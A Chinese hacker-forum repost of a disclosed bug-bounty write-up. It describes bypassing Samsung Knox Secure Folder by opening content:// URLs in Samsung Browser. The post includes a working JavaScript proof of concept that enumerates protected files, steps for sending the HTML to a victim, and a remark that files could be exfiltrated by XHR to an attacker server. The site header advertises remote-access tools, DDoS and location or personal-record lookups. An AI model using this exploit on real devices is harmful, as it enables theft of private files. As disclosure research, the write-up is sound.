注册忘记密码

黑客论坛,黑客工具,黑客教程,QQ技术,黑客基地,黑客网络,黑客软件,黑客联盟,免杀,远控,ddos,cc,黑客攻防,黑客编程,黑客定位,手机定位,微信定位,hack,黑客网站,查开房,定位,信息查询

查看: 286|回复: 0

[网络安全] 安全研究 | 绕过Samsung Knox保护读取安全文件夹存储文件

[复制链接]
   0 UID
   0帖子
   0精华
21
   0威望
500
   0金币
47167
   0贡献
5000
   0阅读权限
   200
   积分
   0
   在线时间
   669 小时
   最后登录
   2020-11-30
发表于 2020-11-12 20:47:38 | 显示全部楼层 |阅读模式

Samsung Knox是防御级移动安全平台,内置于三星设备中,通过物理手段和软件体系相结合的方式全方位增强安全性,从硬件到应用层都提供安全保护。作者通过路径和文件构造,以未授权方式绕过Samsung Knox保护读取安全文件夹中的存储文件,收获三星$3750美元奖励。

漏洞介绍

正常来说,三星多用户存储环境(MULTI-USER STORAGE)使用了安全文件夹APP来加固保密文件,内容提供商(Content Provider)无权访问其中的文件,因此,用浏览器或APP也无法访问多用户存储环境中的相关文件。

该漏洞在于,当安全文件夹处于锁定状态时,可以使用内容URL链接,通过三星浏览器访问这些安全文件。访问多用户存储环境中的特定文件需要在内容URL链接中加上对应的一个文件号,因此,可以利用 javascript 脚本枚举出多用户存储环境中的所有文件。

漏洞复现

1、获取多用户存储环境中的用户信息:

adb shell pm list users

然后会得到以下信息:

UserInfo{0:rahul:1} running
UserInfo{150:Secure Folder: } running

2、构造以下内容URL链接来访问相应文件:

content://[email protected]/external/file/file_number

3、基于该漏洞,构造以下html代码文件对存储中的文件进行枚举:

<html><body><script>var scriptElement = document.createElement("script");var i = 0;function next(){scriptElement.onerror = function() { i++; document.write('Finding'); next(); }; scriptElement.onload = function() { foundIt(); }; scriptElement.src = "content://[email protected]/external/file/" + i; document.body.appendChild(scriptElement);}function foundIt() {alert(scriptElement.src);};</script></body></html>

4、出于验证漏洞,减少攻击步骤,此处把该html文件通过Whatsapp发送给受害者;

5、当受害者在三星浏览器中打开该html文件时,该文件将会执行文件枚举,如果发现有效文件,将会显示出相应的内容URL链接路径(从技术上说也可以在该html文件中设置响应以便攻击者可以获取);

6、同样的,如果在三星浏览器中打开上述获取的内容URL链接,如content://[email protected]/external/file/1002,就可显示出具体的安全文件,之后可以通过xhr请求发送到攻击者控制的服务器中。

漏洞验证

1、发送html文件给受害者:

2、构造content://链接:

3、即可访问存储中的文件:

漏洞报送和处理进程

2020.6.12 漏洞报送
2020.6.15 漏洞分类
2020.7.24 三星方面声称要与内部供应商协调
2020.8.14 三星方面承认漏洞高危
2020.9.15 三星奖励$3750
2020.10.05 三星给予内部漏洞编号SVE-2020-1802

发表回复

您需要登录后才可以回帖 登录 | 注册会员

本版积分规则


快速回复 返回顶部 返回列表